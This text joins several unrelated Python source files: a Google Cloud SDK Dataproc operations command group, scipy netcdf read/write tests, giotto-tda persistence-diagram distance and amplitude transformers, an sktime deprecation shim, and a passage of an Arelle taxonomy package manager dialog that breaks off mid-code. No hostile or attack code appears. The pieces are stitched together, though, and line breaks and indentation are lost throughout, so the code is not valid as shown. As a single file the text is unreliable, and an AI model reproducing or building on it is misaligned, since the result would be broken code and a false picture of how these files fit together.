# Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """The command group for cloud dataproc operations.""" from googlecloudsdk.calliope import base class Operations(base.Group): """View and manage Google Cloud Dataproc operations.""" detailed_help = { 'DESCRIPTION': '{description}', 'EXAMPLES': """\ To cancel an active operation, run: $ {command} cancel operation_id To view the details of an operation, run: $ {command} describe operation_id To see the list of all operations, run: $ {command} list To delete the record of an inactive operation, run: $ {command} delete operation_id """, }
''' Tests for netcdf ''' from __future__ import division, print_function, absolute_import import os from os.path import join as pjoin, dirname import shutil import tempfile import warnings from io import BytesIO from glob import glob from contextlib import contextmanager import numpy as np from numpy.testing import (assert_, assert_allclose, assert_raises, assert_equal, run_module_suite) from scipy.io.netcdf import netcdf_file from scipy._lib._tmpdirs import in_tempdir TEST_DATA_PATH = pjoin(dirname(__file__), 'data') N_EG_ELS = 11 # number of elements for example variable VARTYPE_EG = 'b' # var type for example variable @contextmanager def make_simple(*args, **kwargs): f = netcdf_file(*args, **kwargs) f.history = 'Created for a test' f.createDimension('time', N_EG_ELS) time = f.createVariable('time', VARTYPE_EG, ('time',)) time[:] = np.arange(N_EG_ELS) time.units = 'days since 2008-01-01' f.flush() yield f f.close() def check_simple(ncfileobj): '''Example fileobj tests ''' assert_equal(ncfileobj.history, b'Created for a test') time = ncfileobj.variables['time'] assert_equal(time.units, b'days since 2008-01-01') assert_equal(time.shape, (N_EG_ELS,)) assert_equal(time[-1], N_EG_ELS-1) def assert_mask_matches(arr, expected_mask): ''' Asserts that the mask of arr is effectively the same as expected_mask. In contrast to numpy.ma.testutils.assert_mask_equal, this function allows testing the 'mask' of a standard numpy array (the mask in this case is treated as all False). Parameters ---------- arr: ndarray or MaskedArray Array to test. expected_mask: array_like of booleans A list giving the expected mask. ''' mask = np.ma.getmaskarray(arr) assert_equal(mask, expected_mask) def test_read_write_files(): # test round trip for example file cwd = os.getcwd() try: tmpdir = tempfile.mkdtemp() os.chdir(tmpdir) with make_simple('simple.nc', 'w') as f: pass # read the file we just created in 'a' mode with netcdf_file('simple.nc', 'a') as f: check_simple(f) # add something f._attributes['appendRan'] = 1 # To read the NetCDF file we just created:: with netcdf_file('simple.nc') as f: # Using mmap is the default assert_(f.use_mmap) check_simple(f) assert_equal(f._attributes['appendRan'], 1) # Read it in append (and check mmap is off) with netcdf_file('simple.nc', 'a') as f: assert_(not f.use_mmap) check_simple(f) assert_equal(f._attributes['appendRan'], 1) # Now without mmap with netcdf_file('simple.nc', mmap=False) as f: # Using mmap is the default assert_(not f.use_mmap) check_simple(f) # To read the NetCDF file we just created, as file object, no # mmap. When n * n_bytes(var_type) is not divisible by 4, this # raised an error in pupynere 1.0.12 and scipy rev 5893, because # calculated vsize was rounding up in units of 4 - see # http://www.unidata.ucar.edu/software/netcdf/docs/netcdf.html with open('simple.nc', 'rb') as fobj: with netcdf_file(fobj) as f: # by default, don't use mmap for file-like assert_(not f.use_mmap) check_simple(f) # Read file from fileobj, with mmap with open('simple.nc', 'rb') as fobj: with netcdf_file(fobj, mmap=True) as f: assert_(f.use_mmap) check_simple(f) # Again read it in append mode (adding another att) with open('simple.nc', 'r+b') as fobj: with netcdf_file(fobj, 'a') as f: assert_(not f.use_mmap) check_simple(f) f.createDimension('app_dim', 1) var = f.createVariable('app_var', 'i', ('app_dim',)) var[:] = 42 # And... check that app_var made it in... with netcdf_file('simple.nc') as f: check_simple(f) assert_equal(f.variables['app_var'][:], 42) except: os.chdir(cwd) shutil.rmtree(tmpdir) raise os.chdir(cwd) shutil.rmtree(tmpdir) def test_read_write_sio(): eg_sio1 = BytesIO() with make_simple(eg_sio1, 'w') as f1: str_val = eg_sio1.getvalue() eg_sio2 = BytesIO(str_val) with netcdf_file(eg_sio2) as f2: check_simple(f2) # Test that error is raised if attempting mmap for sio eg_sio3 = BytesIO(str_val) assert_raises(ValueError, netcdf_file, eg_sio3, 'r', True) # Test 64-bit offset write / read eg_sio_64 = BytesIO() with make_simple(eg_sio_64, 'w', version=2) as f_64: str_val = eg_sio_64.getvalue() eg_sio_64 = BytesIO(str_val) with netcdf_file(eg_sio_64) as f_64: check_simple(f_64) assert_equal(f_64.version_byte, 2) # also when version 2 explicitly specified eg_sio_64 = BytesIO(str_val) with netcdf_file(eg_sio_64, version=2) as f_64: check_simple(f_64) assert_equal(f_64.version_byte, 2) def test_read_example_data(): # read any example data files for fname in glob(pjoin(TEST_DATA_PATH, '*.nc')): with netcdf_file(fname, 'r') as f: pass with netcdf_file(fname, 'r', mmap=False) as f: pass def test_itemset_no_segfault_on_readonly(): # Regression test for ticket #1202. # Open the test file in read-only mode. with warnings.catch_warnings(): warnings.simplefilter("ignore") filename = pjoin(TEST_DATA_PATH, 'example_1.nc') with netcdf_file(filename, 'r') as f: time_var = f.variables['time'] # time_var.assignValue(42) should raise a RuntimeError--not seg. fault! assert_raises(RuntimeError, time_var.assignValue, 42) def test_write_invalid_dtype(): dtypes = ['int64', 'uint64'] if np.dtype('int').itemsize == 8: # 64-bit machines dtypes.append('int') if np.dtype('uint').itemsize == 8: # 64-bit machines dtypes.append('uint') with netcdf_file(BytesIO(), 'w') as f: f.createDimension('time', N_EG_ELS) for dt in dtypes: assert_raises(ValueError, f.createVariable, 'time', dt, ('time',)) def test_flush_rewind(): stream = BytesIO() with make_simple(stream, mode='w') as f: x = f.createDimension('x',4) v = f.createVariable('v', 'i2', ['x']) v[:] = 1 f.flush() len_single = len(stream.getvalue()) f.flush() len_double = len(stream.getvalue()) assert_(len_single == len_double) def test_dtype_specifiers(): # Numpy 1.7.0-dev had a bug where 'i2' wouldn't work. # Specifying np.int16 or similar only works from the same commit as this # comment was made. with make_simple(BytesIO(), mode='w') as f: f.createDimension('x',4) f.createVariable('v1', 'i2', ['x']) f.createVariable('v2', np.int16, ['x']) f.createVariable('v3', np.dtype(np.int16), ['x']) def test_ticket_1720(): io = BytesIO() items = [0,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9] with netcdf_file(io, 'w') as f: f.history = 'Created for a test' f.createDimension('float_var', 10) float_var = f.createVariable('float_var', 'f', ('float_var',)) float_var[:] = items float_var.units = 'metres' f.flush() contents = io.getvalue() io = BytesIO(contents) with netcdf_file(io, 'r') as f: assert_equal(f.history, b'Created for a test') float_var = f.variables['float_var'] assert_equal(float_var.units, b'metres') assert_equal(float_var.shape, (10,)) assert_allclose(float_var[:], items) def test_mmaps_segfault(): filename = pjoin(TEST_DATA_PATH, 'example_1.nc') with warnings.catch_warnings(): warnings.simplefilter("error") with netcdf_file(filename, mmap=True) as f: x = f.variables['lat'][:] # should not raise warnings del x def doit(): with netcdf_file(filename, mmap=True) as f: return f.variables['lat'][:] # should not crash with warnings.catch_warnings(): warnings.simplefilter("ignore") x = doit() x.sum() def test_zero_dimensional_var(): io = BytesIO() with make_simple(io, 'w') as f: v = f.createVariable('zerodim', 'i2', []) # This is checking that .isrec returns a boolean - don't simplify it # to 'assert not ...' assert v.isrec is False, v.isrec f.flush() def test_byte_gatts(): # Check that global "string" atts work like they did before py3k # unicode and general bytes confusion with in_tempdir(): filename = 'g_byte_atts.nc' f = netcdf_file(filename, 'w') f._attributes['holy'] = b'grail' f._attributes['witch'] = 'floats' f.close() f = netcdf_file(filename, 'r') assert_equal(f._attributes['holy'], b'grail') assert_equal(f._attributes['witch'], b'floats') f.close() def test_open_append(): # open 'w' put one attr with in_tempdir(): filename = 'append_dat.nc' f = netcdf_file(filename, 'w') f._attributes['Kilroy'] = 'was here' f.close() # open again in 'a', read the att and and a new one f = netcdf_file(filename, 'a') assert_equal(f._attributes['Kilroy'], b'was here') f._attributes['naughty'] = b'Zoot' f.close() # open yet again in 'r' and check both atts f = netcdf_file(filename, 'r') assert_equal(f._attributes['Kilroy'], b'was here') assert_equal(f._attributes['naughty'], b'Zoot') f.close() def test_append_recordDimension(): dataSize = 100 with in_tempdir(): # Create file with record time dimension with netcdf_file('withRecordDimension.nc', 'w') as f: f.createDimension('time', None) f.createVariable('time', 'd', ('time',)) f.createDimension('x', dataSize) x = f.createVariable('x', 'd', ('x',)) x[:] = np.array(range(dataSize)) f.createDimension('y', dataSize) y = f.createVariable('y', 'd', ('y',)) y[:] = np.array(range(dataSize)) f.createVariable('testData', 'i', ('time', 'x', 'y')) f.flush() f.close() for i in range(2): # Open the file in append mode and add data with netcdf_file('withRecordDimension.nc', 'a') as f: f.variables['time'].data = np.append(f.variables["time"].data, i) f.variables['testData'][i, :, :] = np.ones((dataSize, dataSize))*i f.flush() # Read the file and check that append worked with netcdf_file('withRecordDimension.nc') as f: assert_equal(f.variables['time'][-1], i) assert_equal(f.variables['testData'][-1, :, :].copy(), np.ones((dataSize, dataSize))*i) assert_equal(f.variables['time'].data.shape[0], i+1) assert_equal(f.variables['testData'].data.shape[0], i+1) # Read the file and check that 'data' was not saved as user defined # attribute of testData variable during append operation with netcdf_file('withRecordDimension.nc') as f: with assert_raises(KeyError) as ar: f.variables['testData']._attributes['data'] ex = ar.exception assert_equal(ex.args[0], 'data') def test_maskandscale(): t = np.linspace(20, 30, 15) t[3] = 100 tm = np.ma.masked_greater(t, 99) fname = pjoin(TEST_DATA_PATH, 'example_2.nc') with netcdf_file(fname, maskandscale=True) as f: Temp = f.variables['Temperature'] assert_equal(Temp.missing_value, 9999) assert_equal(Temp.add_offset, 20) assert_equal(Temp.scale_factor, np.float32(0.01)) found = Temp[:].compressed() del Temp # Remove ref to mmap, so file can be closed. expected = np.round(tm.compressed(), 2) assert_allclose(found, expected) with in_tempdir(): newfname = 'ms.nc' f = netcdf_file(newfname, 'w', maskandscale=True) f.createDimension('Temperature', len(tm)) temp = f.createVariable('Temperature', 'i', ('Temperature',)) temp.missing_value = 9999 temp.scale_factor = 0.01 temp.add_offset = 20 temp[:] = tm f.close() with netcdf_file(newfname, maskandscale=True) as f: Temp = f.variables['Temperature'] assert_equal(Temp.missing_value, 9999) assert_equal(Temp.add_offset, 20) assert_equal(Temp.scale_factor, np.float32(0.01)) expected = np.round(tm.compressed(), 2) found = Temp[:].compressed() del Temp assert_allclose(found, expected) # ------------------------------------------------------------------------ # Test reading with masked values (_FillValue / missing_value) # ------------------------------------------------------------------------ def test_read_withValuesNearFillValue(): # Regression test for ticket #5626 fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc') with netcdf_file(fname, maskandscale=True) as f: vardata = f.variables['var1_fillval0'][:] assert_mask_matches(vardata, [False, True, False]) def test_read_withNoFillValue(): # For a variable with no fill value, reading data with maskandscale=True # should return unmasked data fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc') with netcdf_file(fname, maskandscale=True) as f: vardata = f.variables['var2_noFillval'][:] assert_mask_matches(vardata, [False, False, False]) assert_equal(vardata, [1,2,3]) def test_read_withFillValueAndMissingValue(): # For a variable with both _FillValue and missing_value, the _FillValue # should be used IRRELEVANT_VALUE = 9999 fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc') with netcdf_file(fname, maskandscale=True) as f: vardata = f.variables['var3_fillvalAndMissingValue'][:] assert_mask_matches(vardata, [True, False, False]) assert_equal(vardata, [IRRELEVANT_VALUE, 2, 3]) def test_read_withMissingValue(): # For a variable with missing_value but not _FillValue, the missing_value # should be used fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc') with netcdf_file(fname, maskandscale=True) as f: vardata = f.variables['var4_missingValue'][:] assert_mask_matches(vardata, [False, True, False]) def test_read_withFillValNaN(): fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc') with netcdf_file(fname, maskandscale=True) as f: vardata = f.variables['var5_fillvalNaN'][:] assert_mask_matches(vardata, [False, True, False]) def test_read_withChar(): fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc') with netcdf_file(fname, maskandscale=True) as f: vardata = f.variables['var6_char'][:] assert_mask_matches(vardata, [False, True, False]) def test_read_with2dVar(): fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc') with netcdf_file(fname, maskandscale=True) as f: vardata = f.variables['var7_2d'][:] assert_mask_matches(vardata, [[True, False], [False, False], [False, True]]) def test_read_withMaskAndScaleFalse(): # If a variable has a _FillValue (or missing_value) attribute, but is read # with maskandscale set to False, the result should be unmasked fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc') # Open file with mmap=False to avoid problems with closing a mmap'ed file # when arrays referring to its data still exist: with netcdf_file(fname, maskandscale=False, mmap=False) as f: vardata = f.variables['var3_fillvalAndMissingValue'][:] assert_mask_matches(vardata, [False, False, False]) assert_equal(vardata, [1, 2, 3]) if __name__ == "__main__": run_module_suite()
# License: Apache 2.0 import numpy as np from sklearn.base import BaseEstimator, TransformerMixin from sklearn.utils.validation import check_is_fitted from ._metrics import _parallel_pairwise, _parallel_amplitude from ._utils import _discretize from ..utils.validation import check_diagram, validate_params, \ validate_metric_params class PairwiseDistance(BaseEstimator, TransformerMixin): """`Distances <https://www.giotto.ai/theory>`_ between pairs of persistence diagrams, constructed from the distances between their respective subdiagrams with constant homology dimension. Given two collections of persistence diagrams consisting of birth-death-dimension triples [b, d, q], a collection of distance matrices or a single distance matrix between pairs of diagrams is calculated according to the following steps: 1. All diagrams are partitioned into subdiagrams corresponding to distinct homology dimensions. 2. Pairwise distances between subdiagrams of equal homology dimension are calculated according to the parameters `metric` and `metric_params`. This gives a collection of distance matrices, :math:`\\mathbf{D} = (D_{q_1}, \\ldots, D_{q_n})`. 3. The final result is either :math:`\\mathbf{D}` itself as a three-dimensional array, or a single distance matrix constructed by taking norms of the vectors of distances between diagram pairs. Parameters ---------- metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \ ``'betti'`` | ``'heat'``, optional, default: ``'bottleneck'`` Distance or dissimilarity function between subdiagrams: - ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named perfect-matching--based notions of distance. - ``'landscape'`` refers to the :math:`L^p` distance between persistence landscapes. - ``'betti'`` refers to the :math:`L^p` distance between Betti curves. - ``'heat'`` refers to the :math:`L^p` distance between Gaussian-smoothed diagrams. metric_params : dict or None, optional, default: ``None`` Additional keyword arguments for the metric function: - If ``metric == 'bottleneck'`` the only argument is `delta` (float, default: ``0.01``). When equal to ``0.``, an exact algorithm is used; otherwise, a faster approximate algorithm is used. - If ``metric == 'wasserstein'`` the available arguments are `p` (int, default: ``2``) and `delta` (float, default: ``0.01``). Unlike the case of ``'bottleneck'``, `delta` cannot be set to ``0.`` and an exact algorithm is not available. - If ``metric == 'betti'`` the available arguments are `p` (float, default: ``2.``) and `n_values` (int, default: ``100``). - If ``metric == 'landscape'`` the available arguments are `p` (float, default: ``2.``), `n_values` (int, default: ``100``) and `n_layers` (int, default: ``1``). - If ``metric == 'heat'`` the available arguments are `p` (float, default: ``2.``), `sigma` (float, default: ``1.``) and `n_values` (int, default: ``100``). order : float or None, optional, default: ``2.`` If ``None``, :meth:`transform` returns for each pair of diagrams a vector of distances corresponding to the dimensions in :attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of these vectors with :math:`p` equal to `order` is taken. n_jobs : int or None, optional, default: ``None`` The number of jobs to use for the computation. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. Attributes ---------- effective_metric_params_ : dict Dictionary containing all information present in `metric_params` as well as on any relevant quantities computed in :meth:`fit`. homology_dimensions_ : list Homology dimensions seen in :meth:`fit`, sorted in ascending order. See also -------- Amplitude, BettiCurve, PersistenceLandscape, HeatKernel, \ giotto.homology.VietorisRipsPersistence Notes ----- To compute distances without first splitting the computation between different homology dimensions, data should be first transformed by an instance of :class:`ForgetDimension`. `Hera <https://bitbucket.org/grey_narn/hera>`_ is used as a C++ backend for computing bottleneck and Wasserstein distances between persistence diagrams. """ _hyperparameters = {'order': [float, (1, np.inf)]} def __init__(self, metric='landscape', metric_params=None, order=2., n_jobs=None): self.metric = metric self.metric_params = metric_params self.order = order self.n_jobs = n_jobs def fit(self, X, y=None): """Store all observed homology dimensions in :attr:`homology_dimensions_` and compute :attr:`effective_metric_params`. Then, return the estimator. This method is there to implement the usual scikit-learn API and hence work in pipelines. Parameters ---------- X : ndarray, shape (n_samples_fit, n_features, 3) Input data. Array of persistence diagrams, each a collection of triples [b, d, q] representing persistent topological features through their birth (b), death (d) and homology dimension (q). y : None There is no need for a target in a transformer, yet the pipeline API requires this parameter. Returns ------- self : object """ X = check_diagram(X) if self.metric_params is None: self.effective_metric_params_ = {} else: self.effective_metric_params_ = self.metric_params.copy() hyperparameters = self.get_params().copy() if self.order is not None: if isinstance(self.order, int): hyperparameters['order'] = float(self.order) else: hyperparameters['order'] = 1. # Automatically pass validate_params validate_params(hyperparameters, self._hyperparameters) validate_metric_params(self.metric, self.effective_metric_params_) self.homology_dimensions_ = sorted(set(X[0, :, 2])) if self.metric in ['landscape', 'heat', 'betti']: self.effective_metric_params_['samplings'], \ self.effective_metric_params_['step_sizes'] = \ _discretize(X, **self.effective_metric_params_) self._X = X return self def transform(self, X, y=None): """Computes a distance or vector of distances between the diagrams in `X` and the diagrams seen in :meth:`fit`. Parameters ---------- X : ndarray, shape (n_samples, n_features, 3) Input data. Array of persistence diagrams, each a collection of triples [b, d, q] representing persistent topological features through their birth (b), death (d) and homology dimension (q). y : None There is no need for a target in a transformer, yet the pipeline API requires this parameter. Returns ------- Xt : ndarray, shape (n_samples_fit, n_samples, n_homology_dimensions) \ if `order` is ``None``, else (n_samples_fit, n_samples) Distance matrix or collection of distance matrices between diagrams in `X` and diagrams seen in :meth:`fit`. In the second case, index i along axis 2 corresponds to the i-th homology dimension in :attr:`homology_dimensions_`. """ check_is_fitted(self, ['effective_metric_params_', 'homology_dimensions_']) X = check_diagram(X) if np.array_equal(X, self._X): X2 = None else: X2 = X Xt = _parallel_pairwise(self._X, X2, self.metric, self.effective_metric_params_, self.homology_dimensions_, self.n_jobs) if self.order is not None: Xt = np.linalg.norm(Xt, axis=2, ord=self.order) return Xt class Amplitude(BaseEstimator, TransformerMixin): """`Amplitudes <https://www.giotto.ai/theory>`_ of persistence diagrams, constructed from the amplitudes of their subdiagrams with constant homology dimension. Given a single persistence diagram consisting of birth-death-dimension triples [b, d, q], a vector of amplitudes or a single scalar amplitude is calculated according to the following steps: 1. All diagrams are partitioned into subdiagrams corresponding to distinct homology dimensions. 2. The amplitude of each subdiagram is calculated according to the parameters `metric` and `metric_params`. This gives a vector of amplitudes, :math:`\\mathbf{a} = (a_{q_1}, \\ldots, a_{q_n})`. 3. The final result is either :math:`\\mathbf{a}` itself or a norm of :math:`\\mathbf{a}`. Parameters ---------- metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \ ``'betti'`` | ``'heat'``, optional, default: ``'bottleneck'`` Distance or dissimilarity function used to define the amplitude of a subdiagram as its distance from the diagonal diagram: - ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named perfect-matching--based notions of distance. - ``'landscape'`` refers to the :math:`L^p` distance between persistence landscapes. - ``'betti'`` refers to the :math:`L^p` distance between Betti curves. - ``'heat'`` refers to the :math:`L^p` distance between Gaussian-smoothed diagrams. metric_params : dict or None, optional, default: ``None`` Additional keyword arguments for the metric function: - If ``metric == 'bottleneck'`` there are no available arguments. - If ``metric == 'wasserstein'`` the only argument is `p` (int, default: ``2``). - If ``metric == 'betti'`` the available arguments are `p` (float, default: ``2.``) and `n_values` (int, default: ``100``). - If ``metric == 'landscape'`` the available arguments are `p` (float, default: ``2.``), `n_values` (int, default: ``100``) and `n_layers` (int, default: ``1``). - If ``metric == 'heat'`` the available arguments are `p` (float, default: ``2.``), `sigma` (float, default: ``1.``) and `n_values` (int, default: ``100``). order : float or None, optional, default: ``2.`` If ``None``, :meth:`transform` returns for each diagram a vector of amplitudes corresponding to the dimensions in :attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of these vectors with :math:`p` equal to `order` is taken. n_jobs : int or None, optional, default: ``None`` The number of jobs to use for the computation. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. Attributes ---------- effective_metric_params_ : dict Dictionary containing all information present in `metric_params` as well as on any relevant quantities computed in :meth:`fit`. homology_dimensions_ : list Homology dimensions seen in :meth:`fit`, sorted in ascending order. See also -------- PairwiseDistance, Scaler, Filtering, \ BettiCurve, PersistenceLandscape, \ HeatKernel, giotto.homology.VietorisRipsPersistence Notes ----- To compute amplitudes without first splitting the computation between different homology dimensions, data should be first transformed by an instance of :class:`ForgetDimension`. """ _hyperparameters = {'order': [float, (1, np.inf)]} def __init__(self, metric='landscape', metric_params=None, order=2., n_jobs=None): self.metric = metric self.metric_params = metric_params self.order = order self.n_jobs = n_jobs def fit(self, X, y=None): """Store all observed homology dimensions in :attr:`homology_dimensions_` and compute :attr:`effective_metric_params`. Then, return the estimator. This method is there to implement the usual scikit-learn API and hence work in pipelines. Parameters ---------- X : ndarray, shape (n_samples, n_features, 3) Input data. Array of persistence diagrams, each a collection of triples [b, d, q] representing persistent topological features through their birth (b), death (d) and homology dimension (q). y : None There is no need for a target in a transformer, yet the pipeline API requires this parameter. Returns ------- self : object """ if self.metric_params is None: self.effective_metric_params_ = {} else: self.effective_metric_params_ = self.metric_params.copy() hyperparameters = self.get_params().copy() if self.order is not None: if isinstance(self.order, int): hyperparameters['order'] = float(self.order) else: hyperparameters['order'] = 1. # Automatically pass validate_params validate_params(hyperparameters, self._hyperparameters) validate_metric_params(self.metric, self.effective_metric_params_) X = check_diagram(X) self.homology_dimensions_ = sorted(set(X[0, :, 2])) if self.metric in ['landscape', 'heat', 'betti']: self.effective_metric_params_['samplings'], \ self.effective_metric_params_['step_sizes'] = \ _discretize(X, **self.effective_metric_params_) return self def transform(self, X, y=None): """Compute the amplitudes or amplitude vectors of diagrams in `X`. Parameters ---------- X : ndarray, shape (n_samples, n_features, 3) Input data. Array of persistence diagrams, each a collection of triples [b, d, q] representing persistent topological features through their birth (b), death (d) and homology dimension (q). y : None There is no need for a target in a transformer, yet the pipeline API requires this parameter. Returns ------- Xt : ndarray, shape (n_samples, n_homology_dimensions) if `order` \ is ``None``, else (n_samples, 1) Amplitudes or amplitude vectors of the diagrams in `X`. In the second case, index i along axis 1 corresponds to the i-th homology dimension in :attr:`homology_dimensions_`. """ check_is_fitted(self, ['effective_metric_params_', 'homology_dimensions_']) X = check_diagram(X) Xt = _parallel_amplitude(X, self.metric, self.effective_metric_params_, self.homology_dimensions_, self.n_jobs) if self.order is None: return Xt Xt = np.linalg.norm(Xt, axis=1, ord=self.order).reshape(-1, 1) return Xt
#!/usr/bin/env python3 -u # -*- coding: utf-8 -*- # copyright: sktime developers, BSD-3-Clause License (see LICENSE file) """Implement transformers for summarizing a time series.""" import warnings from sktime.transformations.series.summarize import WindowSummarizer __all__ = ["WindowSummarizer"] warnings.warn( "WindowSummarizer has been moved to transformations.series.summarize," + " the old location in series.windows_summarize is deprecated since 0.11.0," + " and will be removed in 0.12.0. Please use the import from " + "transformations.series.summarize import WindowSummarizer." )
''' Created on Oct 6, 2013 (from DialogPluginManager.py) @author: Mark V Systems Limited (c) Copyright 2013 Mark V Systems Limited, All rights reserved. ''' from tkinter import simpledialog, Toplevel, font, messagebox, VERTICAL, HORIZONTAL, N, S, E, W from tkinter.constants import DISABLED, ACTIVE try: from tkinter.ttk import Treeview, Scrollbar, Frame, Label, Button except ImportError: from ttk import Treeview, Scrollbar, Frame, Label, Button from arelle import PackageManager, DialogURL from arelle.CntlrWinTooltip import ToolTip import os, time try: import regex as re except ImportError: import re def dialogPackageManager(mainWin): # check for updates in background import threading thread = threading.Thread(target=lambda cntlr=mainWin: backgroundCheckForUpdates(cntlr)) thread.daemon = True thread.start() def backgroundCheckForUpdates(cntlr): cntlr.showStatus(_("Checking for updates to packages")) # clear web loading status packageNamesWithNewerFileDates = PackageManager.packageNamesWithNewerFileDates() if packageNamesWithNewerFileDates: cntlr.showStatus(_("Updates are available for these packages: {0}") .format(', '.join(packageNamesWithNewerFileDates)), clearAfter=5000) else: cntlr.showStatus(_("No updates found for packages."), clearAfter=5000) time.sleep(0.1) # Mac locks up without this, may be needed for empty ui queue? cntlr.uiThreadQueue.put((DialogPackageManager, [cntlr, packageNamesWithNewerFileDates])) class DialogPackageManager(Toplevel): def __init__(self, mainWin, packageNamesWithNewerFileDates): super(DialogPackageManager, self).__init__(mainWin.parent) self.ENABLE = _("Enable") self.DISABLE = _("Disable") self.parent = mainWin.parent self.cntlr = mainWin # copy plugins for temporary display self.packagesConfig = PackageManager.packagesConfig self.packagesConfigChanged = False self.packageNamesWithNewerFileDates = packageNamesWithNewerFileDates parentGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)", self.parent.geometry()) dialogX = int(parentGeometry.group(3)) dialogY = int(parentGeometry.group(4)) self.title(_("Taxonomy Packages Manager")) frame = Frame(self) # left button frame buttonFrame = Frame(frame, width=40) buttonFrame.columnconfigure(0, weight=1) addLabel = Label(buttonFrame, text=_("Find taxonomy packages:"), wraplength=64, justify="center") addLocalButton = Button(buttonFrame, text=_("Locally"), command=self.findLocally) ToolTip(addLocalButton, text=_("File chooser allows selecting taxonomy packages to add (or reload), from the local file system. " "Select either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. "), wraplength=360) addWebButton = Button(buttonFrame, text=_("On Web"), command=self.findOnWeb) ToolTip(addWebButton, text=_("Dialog to enter URL full path to load (or reload) package, from the web or local file system. " "URL may be either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. "), wraplength=360) manifestNameButton = Button(buttonFrame, text=_("Manifest"), command=self.manifestName) ToolTip(manifestNameButton, text=_("Provide pre-PWD non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). " "Uses unix file name pattern matching. " "Multiple manifest files are supported in pre-PWD archives (such as oasis catalogs). " "(Replaces pre-PWD search for either .taxonomyPackage.xml or catalog.xml). "), wraplength=480) self.manifestNamePattern = "" addLabel.grid(row=0, column=0, pady=4) addLocalButton.grid(row=1, column=0, pady=4) addWebButton.grid(row=2, column=0, pady=4) manifestNameButton.grid(row=3, column=0, pady=4) buttonFrame.grid(row=0, column=0, rowspan=3, sticky=(N, S, W), padx=3, pady=3) # right tree frame (packages already known to arelle) packagesFrame = Frame(frame, width=700) vScrollbar = Scrollbar(packagesFrame, orient=VERTICAL) hScrollbar = Scrollbar(packagesFrame, orient=HORIZONTAL) self.packagesView = Treeview(packagesFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=7) self.packagesView.grid(row=0, column=0, sticky=(N, S, E, W)) self.packagesView.bind('<<TreeviewSelect>>', self.packageSelect) hScrollbar["command"] = self.packagesView.xview hScrollbar.grid(row=1, column=0, sticky=(E,W)) vScrollbar["command"] = self.packagesView.yview vScrollbar.grid(row=0, column=1, sticky=(N,S)) packagesFrame.columnconfigure(0, weight=1) packagesFrame.rowconfigure(0, weight=1) packagesFrame.grid(row=0, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3) self.packagesView.focus_set() self.packagesView.column("#0", width=120, anchor="w") self.packagesView.heading("#0", text=_("Name")) self.packagesView["columns"] = ("ver", "status", "date", "update", "descr") self.packagesView.column("ver", width=150, anchor="w", stretch=False) self.packagesView.heading("ver", text=_("Version")) self.packagesView.column("status", width=50, anchor="w", stretch=False) self.packagesView.heading("status", text=_("Status")) self.packagesView.column("date", width=170, anchor="w", stretch=False) self.packagesView.heading("date", text=_("File Date")) self.packagesView.column("update", width=50, anchor="w", stretch=False) self.packagesView.heading("update", text=_("Update")) self.packagesView.column("descr", width=200, anchor="w", stretch=False) self.packagesView.heading("descr", text=_("Description")) remappingsFrame = Frame(frame) vScrollbar = Scrollbar(remappingsFrame, orient=VERTICAL) hScrollbar = Scrollbar(remappingsFrame, orient=HORIZONTAL) self.remappingsView = Treeview(remappingsFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=5) self.remappingsView.grid(row=0, column=0, sticky=(N, S, E, W)) hScrollbar["command"] = self.remappingsView.xview hScrollbar.grid(row=1, column=0, sticky=(E,W)) vScrollbar["command"] = self.remappingsView.yview vScrollbar.grid(row=0, column=1, sticky=(N,S)) remappingsFrame.columnconfigure(0, weight=1) remappingsFrame.rowconfigure(0, weight=1) remappingsFrame.grid(row=1, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3) self.remappingsView.focus_set() self.remappingsView.column("#0", width=200, anchor="w") self.remappingsView.heading("#0", text=_("Prefix")) self.remappingsView["columns"] = ("remapping") self.remappingsView.column("remapping", width=500, anchor="w", stretch=False) self.remappingsView.heading("remapping", text=_("Remapping")) # bottom frame package info details packageInfoFrame = Frame(frame, width=700) packageInfoFrame.columnconfigure(1, weight=1) self.packageNameLabel = Label(packageInfoFrame, wraplength=600, justify="left", font=font.Font(family='Helvetica', size=12, weight='bold')) self.packageNameLabel.grid(row=0, column=0, columnspan=6, sticky=W) self.packageVersionHdr = Label(packageInfoFrame, text=_("version:"), state=DISABLED) self.packageVersionHdr.grid(row=1, column=0, sticky=W) self.packageVersionLabel = Label(packageInfoFrame, wraplength=600, justify="left") self.packageVersionLabel.grid(row=1, column=1, columnspan=5, sticky=W) self.packageDescrHdr = Label(packageInfoFrame, text=_("description:"), state=DISABLED) self.packageDescrHdr.grid(row=2, column=0, sticky=W) 